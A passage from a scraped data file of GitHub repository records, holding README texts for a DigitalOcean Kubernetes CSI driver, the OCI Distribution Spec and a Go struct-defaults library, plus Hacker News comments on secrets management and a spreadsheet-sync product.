out-of-band communication channels.3. 
And speaking of verification, here's how I'm asking users if everything looks right: === secrets.vm ===\n common name: secrets.vm\n fingerprint: b957e10c998faa9909cff3ba4ec35485d04708c3ecc7481fe14d7f07bc0229cd\n public key: c15e697e4807793ef8a9461a7b2c6cf2266d1ec1480a594e83b54e7b75e07702\n public sign: f1db594eb55fe97657c57f2aa01afd1210a46d42d80d5552ac4d548162d4968e\n mnemonic: AM ROBE KIT OMEN BATE ICY TROY RON WHAT HIP OMIT SUP LID CLAY AVER LEAR CAVE REEL CAN PAM FAN LUND RIFT ACME\n does that look right? [y/n]\n\nAFAICT these word-based (it's rfc1751) or sentence based (as recommended by https://www.usenix.org/conference/usenixsecurity16/technical...) are the best we have but do users actually verify these? How do you help your users prove that your server is really your server before they store secrets in it, in a way that they'll actually verify?4. Auditing. How can I, as an end user or as an admin of the server, prove that the server hasn't been tampered with to inject rogue keys? Right now I have a sketch for a merkle tree type log system where the server (1) logs every action (2) links every \"fact\" (a key, a secret, a user) to an entry in the log and (3) signs every log entry along with the log entry before it. Then a user can reconstruct the current state of the database to make sure that it matches. The upside is that it's pretty hard to forge, but the downside is that it's prohibitively expensive to verify: you really have to check the whole thing so you don't want that happening every time you retrieve a secret. And there are some tricky bits like making sure that the log doesn't have orphan entries that are easy to get wrong. Do you have a good solution to the auditing problem?5. Keeping the crypto itself simple and auditable. I use libnacl for the actual crypto and openssl for TLS. I've found that simply writing down every way the crypto is used (https://github.com/ketralnis/secrets/blob/master/DESIGN.md) that I've found a lot of cases where it was too complicated and likely to be messed up. Finding that out made a big difference to me in how I write it: now I describe it first and then write the code and that has made a huge difference in keeping it simple. I don't see really any documentation on your crypto, how do you know you're doing it right?Its interesting to see a lot of alternative implementations of credstash pop up, there was one written in Haskell recently called \"credentials\".\nhttps://github.com/brendanhay/credentialsI don't know much about secret management. How does this compare to something like Vault?Edit: https://www.vaultproject.io/The readme doesn't say what databases are supported, and similarly the config example config file doesn't have a field to configure this either.The only clue is the example SQL for creating the table appears to be MySQL. Is Postgres supported?It's always good to see options out there. But honestly, having being working with Hashicorp's Vault for a while (https://www.vaultproject.io/) I really don't see the need for it. Vault is extremely simple to setup and has many more advanced features without sacrificing functionality. 
There is also Keywhiz (https://square.github.io/keywhiz/single_page.html) which also provides a nifty FUSE abstraction.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "digitalocean/csi-digitalocean", "link": "https://github.com/digitalocean/csi-digitalocean", "tags": ["csi", "kubernetes", "storage", "csi-plugin", "container-orchestration", "hacktoberfest"], "stars": 521, "description": "A Container Storage Interface (CSI) Driver for DigitalOcean Block Storage", "lang": "Go", "repo_lang": "", "readme": "# csi-digitalocean\n\n![](https://github.com/digitalocean/csi-digitalocean/workflows/test/badge.svg)\n\nA Container Storage Interface ([CSI](https://github.com/container-storage-interface/spec)) Driver for [DigitalOcean Block Storage](https://www.digitalocean.com/docs/volumes/). The CSI plugin allows you to use DigitalOcean Block Storage with your preferred Container Orchestrator.\n\nThe DigitalOcean CSI plugin is mostly tested on Kubernetes. Theoretically it\nshould also work on other Container Orchestrators, such as Mesos or\nCloud Foundry. Feel free to test it on other CO's and give us a feedback.\n\n## Releases\n\nThe DigitalOcean CSI plugin follows [semantic versioning](https://semver.org/).\nThe version will be bumped following the rules below:\n\n* Bug fixes will be released as a `PATCH` update.\n* New features (such as CSI spec bumps with no breaking changes) will be released as a `MINOR` update.\n* Significant breaking changes makes a `MAJOR` update.\n\n## Features\n\nBelow is a list of functionality implemented by the plugin. In general, [CSI features](https://kubernetes-csi.github.io/docs/features.html) implementing an aspect of the [specification](https://github.com/container-storage-interface/spec/blob/master/spec.md) are available on any DigitalOcean Kubernetes version for which beta support for the feature is provided.\n\nSee also the [project examples](/examples/kubernetes) for use cases.\n\n### Volume Expansion\n\nVolumes can be expanded by updating the storage request value of the corresponding PVC:\n\n```yaml\napiVersion: v1\nkind: PersistentVolumeClaim\nmetadata:\n name: csi-pvc\n namespace: default\nspec:\n [...]\n resources:\n requests:\n # The field below can be increased.\n storage: 10Gi\n [...]\n```\n\nAfter successful expansion, the _status_ section of the PVC object will reflect the actual volume capacity.\n\nImportant notes:\n\n* Volumes can only be increased in size, not decreased; attempts to do so will lead to an error.\n* Expanding a volume that is larger than the target size will have no effect. The PVC object status section will continue to represent the actual volume capacity.\n* Resizing volumes other than through the PVC object (e.g., the DigitalOcean cloud control panel) is not recommended as this can potentially cause conflicts. Additionally, size updates will not be reflected in the PVC object status section immediately, and the section will eventually show the actual volume capacity.\n\n### Raw Block Volume\n\nVolumes can be used in raw block device mode by setting the `volumeMode` on the corresponding PVC:\n\n```yaml\napiVersion: v1\nkind: PersistentVolumeClaim\nmetadata:\n name: csi-pvc\n namespace: default\nspec:\n [...]\n volumeMode: Block\n```\n\nImportant notes:\n\n* If using volume expansion functionality, only expansion of the underlying persistent volume is guaranteed. 
We do not guarantee to automatically\nexpand the filesystem if you have formatted the device.\n\n### Volume Snapshots\n\nSnapshots can be created and restored through `VolumeSnapshot` objects.\n\n**Note:**\n\nVersion 1 of the CSI driver supports v1alpha1 Volume Snapshots only.\n\nVersion 2 and 3 of the CSI driver supports v1beta1 Volume Snapshots only.\n\nVersion 4 and later of the CSI driver support v1 Volume Snapshots only, which is backwards compatible to v1beta1. However, version 3 renders snapshots unusable that had previously been marked as invalid. See the [csi-snapshotter](https://github.com/kubernetes-csi/external-snapshotter) documentation on the validating webhook and v1beta1 to v1 upgrade notes.\n\n---\n\nSee also [the example](/examples/kubernetes/snapshot).\n\n### Volume Statistics\n\nVolume statistics are exposed through the CSI-conformant endpoints. Monitoring systems such as Prometheus can scrape metrics and provide insights into volume usage.\n\n### Volume Transfer\n\nVolumes can be transferred across clusters. The exact steps are outlined in [our example](/examples/kubernetes/pod-single-existing-volume).\n\n## Installing to Kubernetes\n\n### Kubernetes Compatibility\n\nThe following table describes the required DigitalOcean CSI driver version per supported Kubernetes release.\n\n| Kubernetes Release | DigitalOcean CSI Driver Version |\n|--------------------|---------------------------------|\n| 1.19 | v3 |\n| 1.20 | v3 |\n| 1.21 | v3 |\n| 1.22 | v4 |\n| 1.23 | v4.2.0+ |\n| 1.24 | v4.3.0+ |\n| 1.25 | v4.4.0+ |\n| 1.26 | v4.5.0+ |\n\n---\n**Note:**\n\nThe [DigitalOcean Kubernetes](https://www.digitalocean.com/products/kubernetes/) product comes with the CSI driver pre-installed and no further steps are required.\n\n---\n\n### Driver modes\n\nBy default, the driver supports both the [controller and node mode](https://kubernetes-csi.github.io/docs/deploying.html).\nIt can manage DigitalOcean Volumes via the cloud API and mount them on the required node.\nThe actually used mode is determined by how the driver is deployed and configured.\nThe suggested release manifests provide separate deployments for controller and node modes, respectively.\n\nWhen running outside of DigitalOcean droplets, the driver can only function in **controller mode**.\nThis requires to set the `--region` flag to a valid DigitalOcean region slug in addition to the other flags.\n\nThe `--region` flag **must not** be set when running the driver on DigitalOcean droplets.\n\nAlternatively driver can be run in **node only mode** on DigitalOcean droplets.\nDriver would only handle node related requests like mount volume. Driver runs in **node only mode** when `--token` flag is not provided.\n\nSkip secret creation (section 1. 
in following deployment instructions) when using **node only mode** as API token is not required.\n\n| Modes | `--token` flag | `--region` flag |\n|-------------------------------------------|:----------------:|:----------------:|\n| Controller and Node mode in DigitalOcean |:white_check_mark:| :x: |\n| Controller only mode not in DigitalOcean |:white_check_mark:|:white_check_mark:|\n| Node only mode in DigitalOcean | :x: | :x: |\n\n### Requirements\n\n* `--allow-privileged` flag must be set to true for the API server\n* `--allow-privileged` flag must be set to true for the kubelet in Kubernetes 1.14 and below (flag does not exist in later releases)\n* `--feature-gates=KubeletPluginsWatcher=true,CSINodeInfo=true,CSIDriverRegistry=true` feature gate flags must be set to true for both the API server and the kubelet\n* Mount Propagation needs to be enabled. If you use Docker, the Docker daemon of the cluster nodes must allow shared mounts.\n\n#### 1. Create a secret with your DigitalOcean API Access Token\n\nReplace the placeholder string starting with `a05...` with your own secret and\nsave it as `secret.yml`:\n\n```yaml\napiVersion: v1\nkind: Secret\nmetadata:\n name: digitalocean\n namespace: kube-system\nstringData:\n access-token: \"a05dd2f26b9b9ac2asdas__REPLACE_ME____123cb5d1ec17513e06da\"\n```\n\nand create the secret using kubectl:\n\n```shell\n$ kubectl create -f ./secret.yml\nsecret \"digitalocean\" created\n```\n\nYou should now see the digitalocean secret in the `kube-system` namespace along with other secrets\n\n```shell\n$ kubectl -n kube-system get secrets\nNAME TYPE DATA AGE\ndefault-token-jskxx kubernetes.io/service-account-token 3 18h\ndigitalocean Opaque 1 18h\n```\n\n#### 2. Provide authentication data for the snapshot validation webhook\n\nSnapshots are validated through a `ValidatingWebhookConfiguration` which requires proper CA, certificate, and key data. The manifests in `snapshot-validation-webhook.yaml` should provide sufficient scaffolding to inject the data accordingly. However, the details on how to create and manage them is up to the user and dependent on the exact environment the webhook runs in. See the `XXX`-marked comments in the manifests file for user-required injection points. \n\nThe [official snapshot webhook example](https://github.com/kubernetes-csi/external-snapshotter/tree/master/deploy/kubernetes/webhook-example) offers a non-production-ready solution suitable for testing. For full production readiness, something like [cert-manager](https://cert-manager.io/) can be leveraged. \n\n\n#### 3. Deploy the CSI plugin and sidecars\n\nAlways use the [latest release](https://github.com/digitalocean/csi-digitalocean/releases) compatible with your Kubernetes release (see the [compatibility information](#kubernetes-compatibility)).\n\nThe [releases directory](deploy/kubernetes/releases) holds manifests for all plugin releases. You can deploy a specific version by executing the command\n\n```shell\n# Do *not* add a blank space after -f\nkubectl apply -fhttps://raw.githubusercontent.com/digitalocean/csi-digitalocean/master/deploy/kubernetes/releases/csi-digitalocean-vX.Y.Z/{crds.yaml,driver.yaml,snapshot-controller.yaml}\n```\n\nwhere `vX.Y.Z` is the plugin target version. (Note that for releases older than v2.0.0, the driver was contained in a single YAML file. 
If you'd like to deploy an older release you need to use `kubectl apply -fhttps://raw.githubusercontent.com/digitalocean/csi-digitalocean/master/deploy/kubernetes/releases/csi-digitalocean-vX.Y.Z.yaml`)\n\nIf you see any issues during the installation, this could be because the newly\ncreated CRDs haven't been established yet. If you call `kubectl apply -f` again\non the same file, the missing resources will be applied again.\n\nThe above does not include the snapshot validating webhook which needs extra configuration as outlined above. You may append `,snapshot-validation-webhook.yaml` to the `{...}` list if you want to install a (presumably configured) webhook as well. \n\n#### 4. Test and verify\n\nCreate a PersistentVolumeClaim. This makes sure a volume is created and provisioned on your behalf:\n\n```yaml\napiVersion: v1\nkind: PersistentVolumeClaim\nmetadata:\n name: csi-pvc\nspec:\n accessModes:\n - ReadWriteOnce\n resources:\n requests:\n storage: 5Gi\n storageClassName: do-block-storage\n```\n\nCheck that a new `PersistentVolume` is created based on your claim:\n\n```shell\n$ kubectl get pv\nNAME CAPACITY ACCESS MODES RECLAIM POLICY STATUS CLAIM STORAGECLASS REASON AGE\npvc-0879b207-9558-11e8-b6b4-5218f75c62b9 5Gi RWO Delete Bound default/csi-pvc do-block-storage 3m\n```\n\nThe above output means that the CSI plugin successfully created (provisioned) a\nnew Volume on behalf of you. You should be able to see this newly created\nvolume under the [Volumes tab in the DigitalOcean UI](https://cloud.digitalocean.com/droplets/volumes)\n\nThe volume is not attached to any node yet. It'll only attached to a node if a\nworkload (i.e: pod) is scheduled to a specific node. Now let us create a Pod\nthat refers to the above volume. When the Pod is created, the volume will be\nattached, formatted and mounted to the specified Container:\n\n```yaml\nkind: Pod\napiVersion: v1\nmetadata:\n name: my-csi-app\nspec:\n containers:\n - name: my-frontend\n image: busybox\n volumeMounts:\n - mountPath: \"/data\"\n name: my-do-volume\n command: [ \"sleep\", \"1000000\" ]\n volumes:\n - name: my-do-volume\n persistentVolumeClaim:\n claimName: csi-pvc\n```\n\nCheck if the pod is running successfully:\n\n```shell\nkubectl describe pods/my-csi-app\n```\n\nWrite inside the app container:\n\n```shell\n$ kubectl exec -ti my-csi-app /bin/sh\n/ # touch /data/hello-world\n/ # exit\n$ kubectl exec -ti my-csi-app /bin/sh\n/ # ls /data\nhello-world\n```\n\n## Upgrading\n\nWhen upgrading to a new Kubernetes minor version, you should upgrade the CSI\ndriver to match. See the table above for which driver version is used with each\nKubernetes version.\n\nSpecial consideration is necessary when upgrading from Kubernetes 1.11 or\nearlier, which uses CSI driver version 0.2 or earlier. In these early releases,\nthe driver name was `com.digitalocean.csi.dobs`, while in all subsequent\nreleases it is `dobs.csi.digitalocean.com`. When upgrading, use the commandline\nflag `--driver-name` to force the new driver to use the old name. Failing to do\nso will cause any existing PVs to be unusable since the new driver will not\nmanage them and the old driver is no longer running.\n\n## Configuration\n\n### Default volumes paging size\n\nSome CSI driver operations require paging through the volumes returned from the DO Volumes API. 
By default, the page size is not defined and causes the DO API to choose a value as specified in the [API reference](https://docs.digitalocean.com/reference/api/api-reference/#section/Introduction/Links-and-Pagination). In the vast majority of cases, this should work fine. However, for accounts with a very large number of volumes, the API server-chosen default page size may be too small to return all volumes within the configured (sidecar-provided) timeout.\n\nFor that reason, the default page size can be customized by passing the `--default-volumes-page-size` flag a positive number.\n\n---\n**Notes:**\n\n1. The user is responsible for selecting a value below the maximum limit mandated by the DO API. Please see the API reference link above to see the current limit.\n2. The configured sidecar timeout values may need to be aligned with the chosen page size. In particular, csi-attacher invokes `ListVolumes` to periodically synchronize the API and cluster-local volume states; as such, its timeout must be large enough to account for the expected number of volumes in the given account and region. \n3. The default page size does not become effective if an explicit page size (more precisely, _max entries_ in CSI spec speak) is passed to a given gRPC method.\n\n### API rate limiting\n\nDO API usage is subject to [certain rate limits](https://docs.digitalocean.com/reference/api/api-reference/#section/Introduction/Rate-Limit). In order to protect against running out of quota for extremely heavy regular usage or pathological cases (e.g., bugs or API thrashing due to an interfering third-party controller), a custom rate limit can be configured via the `--do-api-rate-limit` flag. It accepts a float value, e.g., `--do-api-rate-limit=3.5` to restrict API usage to 3.5 queries per second.\n\n---\n\n## Development\n\nRequirements:\n\n* Go at the version specified in `.github/workflows/test.yaml`\n* Docker (for building via the Makefile, post-unit testing, and publishing)\n\nDependencies are managed via [Go modules](https://github.com/golang/go/wiki/Modules).\n\nPRs from the code-hosting repository are automatically unit- and end-to-end-tested in our CI (implemented by Github Actions). See the [.github/workflows directory](.github/workflows) for details.\n\nFor every green build of the master branch, the container image `digitalocean/do-csi-plugin:master` is updated and pushed at the end of the CI run. This allows to test the latest commit easily.\n\nSteps to run the tests manually are outlined below.\n\n### Unit Tests\n\nTo execute the unit tests locally, run:\n\n```shell\nmake test\n```\n\n### End-to-End Tests\n\nTo manually run the end-to-end tests, you need to build a container image for your change first and publish it to a registry. 
Repository owners can publish under `digitalocean/do-csi-plugin:dev`:\n\n```shell\nVERSION=dev make publish\n```\n\nIf you do not have write permissions to `digitalocean/do-csi-plugin` on Docker Hub or are worried about conflicting usage of that tag, you can also publish under a different (presumably personal) organization:\n\n```shell\nDOCKER_REPO=johndoe VERSION=latest-feature make publish\n```\n\nThis would yield the published container image `johndoe/do-csi-plugin:latest-feature`.\n\nAssuming you have your DO API token assigned to the `DIGITALOCEAN_ACCESS_TOKEN` environment variable, you can then spin up a DOKS cluster on-the-fly and execute the upstream end-to-end tests for a given set of Kubernetes versions like this:\n\n```shell\nmake test-e2e E2E_ARGS=\"-driver-image johndoe/do-csi-plugin:latest-feature 1.16 1.15 1.14\"\n```\n\nSee [our documentation](test/e2e/README.md) for an overview on how the end-to-end tests work as well as usage instructions.\n\n### Integration Tests\n\nThere is a set of custom integration tests which are mostly useful for Kubernetes pre-1.14 installations as these are not covered by the upstream end-to-end tests.\n\nTo run the integration tests on a DOKS cluster, follow [the instructions](test/kubernetes/deploy/README.md).\n\n## Prepare CSI driver for a new Kubernetes minor version\n\n1. Review recently merged PRs and any in-progress / planned work to ensure any bugs scheduled for the release have been fixed and merged.\n2. [Bump kubernetes dependency versions](#updating-the-kubernetes-dependencies)\n3. [Support running e2e on new $MAJOR.$MINOR](test/e2e/README.md#add-support-for-a-new-kubernetes-release)\n 1. Since we only support three minor versions at a time. E2e tests for the oldest supported version can be removed.\n4. Verify [e2e tests pass](.github/workflows/test.yaml) - see [here](#end-to-end-tests) about running tests locally\n5. Prepare for [release](#releasing)\n6. Perform [release](.github/workflows/release.yaml)\n\n> See [e2e test README](test/e2e/README.md) on how to run conformance tests locally.\n\n### Updating the Kubernetes dependencies\n\nRun\n\n```shell\nmake NEW_KUBERNETES_VERSION=X.Y.Z update-k8s\n```\n\nto update the Kubernetes dependencies to version X.Y.Z.\n\n> Note: Make sure to also add support to the e2e tests for the new kubernetes version, following [these instructions](test/e2e/README.md#add-support-for-a-new-kubernetes-release).\n\n### Releasing\n\nReleases may happen either for the latest minor version of the CSI driver maintained in the `master` branch, or an older minor version still maintained in one of the `release-*` branches. In this section, we will call that branch the _release branch_.\n\nTo release a new version `vX.Y.Z`, first check out the release branch and bump the version:\n\n```shell\nmake NEW_VERSION=vX.Y.Z bump-version\n```\n\nThis will create the set of files specific to a new release. Make sure everything looks good; in particular, ensure that the change log is up-to-date and is not missing any important, user-facing changes.\n\nCreate a new branch with all changes:\n\n```shell\ngit checkout -b prepare-release-vX.Y.Z\ngit add .\ngit push origin\n```\n\nAfter it is merged to the release branch, wait for the release branch build to go green. 
(This will entail another run of the entire test suite.)\n\nFinally, check out the release branch again, tag the release, and push it:\n\n```shell\ngit checkout \ngit pull\ngit tag vX.Y.Z\ngit push origin vX.Y.Z\n```\n\n(This works for non-master release branches as well since the `checkout` Github Action we use defaults to checking out the ref/SHA that triggered the workflow.)\n\nThe CI will publish the container image `digitalocean/do-csi-plugin:vX.Y.Z` and create a Github Release under the name `vX.Y.Z` automatically. Nothing else needs to be done.\n\n## Contributing\n\nAt DigitalOcean we value and love our community! If you have any issues or would like to contribute, feel free to open an issue or PR.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "opencontainers/distribution-spec", "link": "https://github.com/opencontainers/distribution-spec", "tags": ["oci", "containers", "docker"], "stars": 521, "description": "OCI Distribution Specification", "lang": "Go", "repo_lang": "", "readme": "# OCI Distribution Specification\n\n[![GitHub Actions status](https://github.com/opencontainers/distribution-spec/workflows/build/badge.svg)](https://github.com/opencontainers/distribution-spec/actions?query=workflow%3Abuild)\n\nThe OCI Distribution Spec project defines an API protocol to facilitate and standardize the distribution of content.\n\n**[The specification can be found here](spec.md).**\n\nThis repository also provides [Go types](specs-go), and [registry conformance tooling](conformance).\nThe Go types and validation should be compatible with the current Go release; earlier Go releases are not supported.\n\nAdditional documentation about how this group operates:\n\n- [Contributing](CONTRIBUTING.md)\n- [Governance](GOVERNANCE.md)\n- [Maintainers' Guide](MAINTAINERS_GUIDE.md)\n- [Releases](RELEASES.md)\n\nThe _optional_ and _base_ layers of all OCI projects are tracked in the [OCI Scope Table](https://www.opencontainers.org/about/oci-scope-table).\n\n## Distributing OCI Images and other content\n\nThe OCI Distribution Spec is closely related to the [OCI Image Format Specification] project,\nthe [OCI Runtime Specification] project,\nand the [OCI Artifacts] project.\n\nThe [OCI Image Format Specification] strictly defines the requirements for an OCI Image (container image), which consists of\na manifest, an optional image index, a set of filesystem layers, and a configuration.\nThe schema for OCI Image components is fully supported by the APIs defined in the OCI Distribution Specification.\n\nThe [OCI Runtime Specification] defines how to properly run a container \"[filesystem bundle](https://github.com/opencontainers/runtime-spec/blob/master/bundle.md)\"\nwhich fully adheres to the OCI Image Format Specification. The OCI Runtime Specification is relevant to the OCI Distribution Specification in that they both support OCI Images,\nand that container runtimes use the APIs defined in the OCI Distribution Specification to fetch pre-built container images and run them.\n\nThe [OCI Distribution Specification] (this project) is also designed generically enough to be leveraged as a distribution mechanism for\nany type of content. 
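
To make that blob-referencing model concrete, here is a small illustrative sketch. It is an assumption made purely for illustration: it uses the Go bindings from the separate OCI image-spec module rather than the `specs-go` types shipped in this repository, and it builds a manifest whose config and layers are referenced only by media type, content digest, and size.

```go
package main

import (
	"encoding/json"
	"fmt"

	"github.com/opencontainers/go-digest"
	specs "github.com/opencontainers/image-spec/specs-go"
	v1 "github.com/opencontainers/image-spec/specs-go/v1"
)

func main() {
	// Dummy blob contents; a registry only ever sees their digests and sizes.
	cfgBlob := []byte(`{"architecture":"amd64","os":"linux"}`)
	layerBlob := []byte("example layer contents")

	manifest := v1.Manifest{
		Versioned: specs.Versioned{SchemaVersion: 2},
		MediaType: v1.MediaTypeImageManifest,
		Config: v1.Descriptor{
			MediaType: v1.MediaTypeImageConfig,
			Digest:    digest.FromBytes(cfgBlob),
			Size:      int64(len(cfgBlob)),
		},
		Layers: []v1.Descriptor{{
			MediaType: v1.MediaTypeImageLayerGzip,
			Digest:    digest.FromBytes(layerBlob),
			Size:      int64(len(layerBlob)),
		}},
	}

	// The JSON below is what gets pushed to and pulled from a registry's
	// manifest endpoint; the referenced blobs are uploaded separately.
	out, _ := json.MarshalIndent(manifest, "", "  ")
	fmt.Println(string(out))
}
```

A registry implementing this specification does not interpret the config or layer contents; the digests and sizes in such a manifest are enough to store, serve, and verify the corresponding blobs.
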
The format of uploaded manifests, for example, need not necessarily adhere to the OCI Image Format Specification\nso long as it references the blobs which comprise a given artifact.\n\nThe [OCI Artifacts] project is an effort to provide guidance on how to\nproperly define and distribute content using the OCI Distribution Specification for artifacts which are not container filesystem bundles,\nin a way that is mostly compatible with the existing schemas defined in the OCI Image Format Specification.\n\n[OCI Image Format Specification]: https://github.com/opencontainers/image-spec\n[OCI Runtime Specification]: https://github.com/opencontainers/runtime-spec\n[OCI Distribution Specification]: https://github.com/opencontainers/distribution-spec\n[OCI Artifacts]: https://github.com/opencontainers/artifacts\n\n## FAQ\n\nFor questions about the OCI Distribution Specification, please see the [FAQ](FAQ.md).\n\nFor general questions about OCI, please see the [FAQ on the OCI site](https://www.opencontainers.org/faq).\n\n## Roadmap\n\nThe [GitHub milestones](https://github.com/opencontainers/distribution-spec/milestones) lay out the path to the future improvements.\n\n# Contributing\n\nDevelopment happens on GitHub for the spec.\nIssues are used for bugs and actionable items and longer discussions can happen on the [mailing list](#mailing-list).\n\nThe specification and code is licensed under the Apache 2.0 license found in the `LICENSE` file of this repository.\n\n## Discuss your design\n\nThe project welcomes submissions, but please let everyone know what you are working on.\n\nBefore undertaking a nontrivial change to this specification, send mail to the [mailing list](#mailing-list) to discuss what you plan to do.\nThis gives everyone a chance to validate the design, helps prevent duplication of effort, and ensures that the idea fits.\nIt also guarantees that the design is sound before code is written; a GitHub pull-request is not the place for high-level discussions.\n\nTypos and grammatical errors can go straight to a pull-request.\nWhen in doubt, start on the [mailing-list](#mailing-list).\n\n## Meetings\n\nPlease see the [OCI org repository README](https://github.com/opencontainers/org#meetings) for the most up-to-date information on OCI contributor and maintainer meeting schedules.\nYou can also find links to meeting agendas and minutes for all prior meetings.\n\n## Mailing List\n\nYou can subscribe and join the mailing list on [Google Groups](https://groups.google.com/a/opencontainers.org/forum/#!forum/dev).\n\n## Chat\n\nOCI discussion happens in the following chat rooms, which are all bridged together:\n\n- #general channel on [OCI Slack](https://chat.opencontainers.org/)\n- #opencontainers:matrix.org\n- #opencontainers on freenode.net\n\n## Markdown style\n\nTo keep consistency throughout the Markdown files in the Open Container spec all files should be formatted one sentence per line.\nThis fixes two things: it makes diffing easier with git and it resolves fights about line wrapping length.\nFor example, this paragraph will span three lines in the Markdown source.\n\n## Git commit\n\n### Sign your work\n\nThe sign-off is a simple line at the end of the explanation for the patch, which certifies that you wrote it or otherwise have the right to pass it on as an open-source patch.\nThe rules are pretty simple: if you can certify the below (from [developercertificate.org](http://developercertificate.org/)):\n\n```\nDeveloper Certificate of Origin\nVersion 1.1\n\nCopyright (C) 2004, 2006 The 
Linux Foundation and its contributors.\n660 York Street, Suite 102,\nSan Francisco, CA 94110 USA\n\nEveryone is permitted to copy and distribute verbatim copies of this\nlicense document, but changing it is not allowed.\n\n\nDeveloper's Certificate of Origin 1.1\n\nBy making a contribution to this project, I certify that:\n\n(a) The contribution was created in whole or in part by me and I\n have the right to submit it under the open source license\n indicated in the file; or\n\n(b) The contribution is based upon previous work that, to the best\n of my knowledge, is covered under an appropriate open source\n license and I have the right under that license to submit that\n work with modifications, whether created in whole or in part\n by me, under the same open source license (unless I am\n permitted to submit under a different license), as indicated\n in the file; or\n\n(c) The contribution was provided directly to me by some other\n person who certified (a), (b) or (c) and I have not modified\n it.\n\n(d) I understand and agree that this project and the contribution\n are public and that a record of the contribution (including all\n personal information I submit with it, including my sign-off) is\n maintained indefinitely and may be redistributed consistent with\n this project or the open source license(s) involved.\n```\n\nthen you just add a line to every git commit message:\n\n Signed-off-by: Jane Smith \n\nusing your real name (sorry, no pseudonyms or anonymous contributions.)\n\nYou can add the sign off when creating the git commit via `git commit -s`.\n\n### Commit Style\n\nSimple house-keeping for clean git history.\nRead more on [How to Write a Git Commit Message](http://chris.beams.io/posts/git-commit/) or the Discussion section of [`git-commit(1)`](http://git-scm.com/docs/git-commit).\n\n1. Separate the subject from body with a blank line\n2. Limit the subject line to 50 characters\n3. Capitalize the subject line\n4. Do not end the subject line with a period\n5. Use the imperative mood in the subject line\n6. Wrap the body at 72 characters\n7. Use the body to explain what and why vs. how\n* If there was important/useful/essential conversation or information, copy or include a reference\n8. When possible, one keyword to scope the change in the subject (i.e. 
\"README: ...\", \"runtime: ...\")\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "creasty/defaults", "link": "https://github.com/creasty/defaults", "tags": ["golang", "struct", "slice", "map", "nested", "initialize"], "stars": 521, "description": "Initialize structs with default values", "lang": "Go", "repo_lang": "", "readme": "defaults\n========\n\n[![CircleCI](https://circleci.com/gh/creasty/defaults/tree/master.svg?style=svg)](https://circleci.com/gh/creasty/defaults/tree/master)\n[![codecov](https://codecov.io/gh/creasty/defaults/branch/master/graph/badge.svg)](https://codecov.io/gh/creasty/defaults)\n[![GitHub release](https://img.shields.io/github/release/creasty/defaults.svg)](https://github.com/creasty/defaults/releases)\n[![License](https://img.shields.io/github/license/creasty/defaults.svg)](./LICENSE)\n\nInitialize structs with default values\n\n- Supports almost all kind of types\n - Scalar types\n - `int/8/16/32/64`, `uint/8/16/32/64`, `float32/64`\n - `uintptr`, `bool`, `string`\n - Complex types\n - `map`, `slice`, `struct`\n - Nested types\n - `map[K1]map[K2]Struct`, `[]map[K1]Struct[]`\n - Aliased types\n - `time.Duration`\n - e.g., `type Enum string`\n - Pointer types\n - e.g., `*SampleStruct`, `*int`\n- Recursively initializes fields in a struct\n- Dynamically sets default values by [`defaults.Setter`](./setter.go) interface\n- Preserves non-initial values from being reset with a default value\n\n\nUsage\n-----\n\n```go\ntype Gender string\n\ntype Sample struct {\n\tName string `default:\"John Smith\"`\n\tAge int `default:\"27\"`\n\tGender Gender `default:\"m\"`\n\n\tSlice []string `default:\"[]\"`\n\tSliceByJSON []int `default:\"[1, 2, 3]\"` // Supports JSON\n\n\tMap map[string]int `default:\"{}\"`\n\tMapByJSON map[string]int `default:\"{\\\"foo\\\": 123}\"`\n\tMapOfStruct map[string]OtherStruct\n\tMapOfPtrStruct map[string]*OtherStruct\n\tMapOfStructWithTag map[string]OtherStruct `default:\"{\\\"Key1\\\": {\\\"Foo\\\":123}}\"`\n \n\tStruct OtherStruct `default:\"{}\"`\n\tStructPtr *OtherStruct `default:\"{\\\"Foo\\\": 123}\"`\n\n\tNoTag OtherStruct // Recurses into a nested struct by default\n\tOptOut OtherStruct `default:\"-\"` // Opt-out\n}\n\ntype OtherStruct struct {\n\tHello string `default:\"world\"` // Tags in a nested struct also work\n\tFoo int `default:\"-\"`\n\tRandom int `default:\"-\"`\n}\n\n// SetDefaults implements defaults.Setter interface\nfunc (s *OtherStruct) SetDefaults() {\n\tif defaults.CanUpdate(s.Random) { // Check if it's a zero value (recommended)\n\t\ts.Random = rand.Int() // Set a dynamic value\n\t}\n}\n```\n\n```go\nobj := &Sample{}\nif err := defaults.Set(obj); err != nil {\n\tpanic(err)\n}\n```\n", "readme_type": "markdown", "hn_comments": "What about importing sheets too?Not very familiar with the sheets API, but was wondering: how are rate limits applied? Per sheet or in total?Is there a way to get a stream of changes out of prequel (via websocket)?\nThat would make it possible to live-sync between the customer's devices.Would an alternative to this approach be to let your customers copy a spreadsheet of yours that already has an API function connection to your data? This would avoid the need to create users and upserts and all that, no? 
Or am I missing something?I wonder how long it will be until you have a customer using this just to share data to their own internal teams just so the data team doesn't have to mess around with Sheets!Also\u2014I want Prequel for Zendesk and Greenhouse (and Asana and ...) so badly. There are so many more interesting things I want to be doing with my time at work than babysitting pipelines.You should get Apollo to buy Prequel. Fivetran doesn't support Apollo and I could really use my Apollo data in Snowflake.Nice! Is it a two way sync? I noticed the sheets were locked in the demo.That's a bit of an unfortunate name clash with PRQL, also pronounced prequel: https://prql-lang.org/> To make this possible without creating a superuser that would have access to _all_ the sheets, we had to programmatically generate a different user for each of our customers. We do this via the GCP IAM API, creating a new service account every time. We then auth into the sheet through this service account.nice solution! i've worked with updating sheets in real time with data from the Admin SDK using the Sheets API and service accounts, but yeah that domain-wide delegation is fine for our corp stuff but not so good for customers!great work, will give this a try out for sure! :thumbsup:Interesting! Any plans for SalesForce support?We'd love to have a way to easily sync our internal system's data in/out of SFDC....and a source of GraphQL? :-)One of our engineers recently suggested syncing our PG database to Airtable, solely b/c Airtable has out-of-the-box SFDC integration (webhooks/etc), so our SFDC team could get at the data easier than they could from our PG database.I'm hesitant about \"Airtable as our official 3rd-party integration strategy\", but it does make me pine for a \"protocol\" for one-way/two-way real-time/batch syncing between two systems that just want to share \"dumb\" tables+fields/entities.I was thinking Zapier might have that, like if we implemented the Zapier-TM backend protocol on top of our custom system, and it would ~insta integrate with everything, but in my ~10 